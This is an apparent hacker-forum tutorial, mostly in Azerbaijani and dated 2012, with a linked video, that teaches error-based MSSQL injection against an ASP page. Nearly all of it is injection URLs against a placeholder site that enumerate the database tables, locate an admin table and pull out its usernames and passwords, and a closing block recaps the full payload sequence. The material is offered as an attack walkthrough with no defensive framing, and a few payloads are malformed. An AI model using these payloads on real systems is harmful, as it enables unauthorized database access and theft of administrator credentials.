MSSQL Injection

1. Video :
2. http://youtu.be/SvXgG0Aph1k
3.  
4. Source:
5. [code]#################################################################
6. # IN THE NAME OF ALLAH
7. # Date : 2012-04-09
8. # Subject : MsSQL Injection
9. # Author : Avatar [Fearless]
10. # Software : Anti-armeniaa.ORG // Pirates-Crew.ORG // Mexfi.ORG // Pwn.Me :D
11. # Team'Z : AA Team // PC Team // MF Team // The Fear // Pwn Team :D // UG Team
12. # Greet`Z To : All The Member'Z of The Team'Z
13. # Respect To : All My Bro'Z
14. # About : CGM [<3E>] LD :D
15. # Tested On : Windows 7 Ultimate x86[Demo]
16. #################################################################
17. Let'Z Start :
18. Salamlar... Bu Gun Sizlere MsSQL Injection Dersliyi Sunuram... QEYD Edimki ZamaN paylashmishdi mende video-lu cekdim... 1 -de 1 shey qeyd edim OFF-TOpa
19. gore uzrlu hesab edin helede windows aktiv deyil Windows Loader ile duzelt-meye calishdim sondurub yandirdim alinmadi... Her Neyse indi ishimize qayidaq
20. new 1 adli belgede 0-dan sona yazilib baxaq Sozun duzu yadimda qalmir deye istifade edirem :D aha ilk olaraq burdan bashlayaq
21. # Target Site : http://site.com/index.asp?ID=5
22. # Open[aciq:D loru dilde] : http://site.com/index.asp?ID=5'
23. indi bashlayaq table-lere baxmaga yada DB adi desekde olar :D DB adina baxmaga
24. # DB Name : http://site.com/index.asp?ID=5 having 1=1-- ; Polly
25. :D ve indi tableler
26. # http://site.com/index.asp?ID=5 or 1=convert(int,(select top 1 table_name from information_schema.tables))--
27. demeli burda table_name from information_schema.tables-- yeqin tanidiniz tutaqki qarshimiza Info cixdi bize ise bu lazim deyil o birisine baxaq
28. # http://site.com/index.asp?ID=5 or 1=convert(int,(select top 1 table_name from information_schema.tables where table_name not in("info")))--
29. ve qarshimiza admin cixdi
30. # Table Name : admin
31. # http://site.com/index.asp?ID=5 Select * from admin having 1=1--
32. # Qarshimiza cixan Column adi : username
33. # http://site.com/index.asp?ID=5 select * from admin group by admin.username having 1=1--
34. burda admin.username = table.column
35. 1 sheyide qeyd edimki bu : http://site.com/index.asp?ID=5 select * from admin group by admin.username having 1=1-- url-e daxil olanda bashqa 1 column
36. gelir
37. # http://site.com/index.asp?ID=5 select * from admin group by admin.username,admin.password having 1=1--
38. bu zamanda dogrulugun istablayiriq ve o zaman admin is invalid yazir... yada buna benzer indi username + pass cekek
39. # http://site.com/index.asp?ID=5 or 1 = (select top username from admin)--
40. bu zaman username gelir
41. # http://site.com/index.asp?ID=5 or 1 = (select top password from admin)--
42. bu zamanda pass gelir qeyd bu cur pass/uname/dbname/tablename/columnname kimi yazilar ortada "" isarelerinin icinde gelir o zaman anlaya bilersiniz
43. ve birazda mentiq... Bu Gunluk bu qeder... Video by . Avatar [Fearless][/code]
44.  
45. 0-dan Sona :
46. [code]http://site.com/index.asp?ID=5
47. http://site.com/index.asp?ID=5'
48. http://site.com/index.asp?ID=5 having 1=1--
49. http://site.com/index.asp?ID=5 or 1=convert(int,(select top 1 table_name from information_schema.tables))--
50. http://site.com/index.asp?ID=5 or 1=convert(int,(select top 1 table_name from information_schema.tables where table_name not in("Info")))--
51. http://site.com/index.asp?ID=5 Select * from admin having 1=1--
52. http://site.com/index.asp?ID=5 Select * from Admin group by admin.username having 1=1--
53. http://site.com/index.asp?ID=5 Select * from table group by table.password,table.password having 1=1--
54. http://site.com/index.asp?ID=5 or 1 = (select top 1 username from admin)--
55. http://site.com/index.asp?ID=5 or 1 = (select top 1 password from table)--
56. [/code]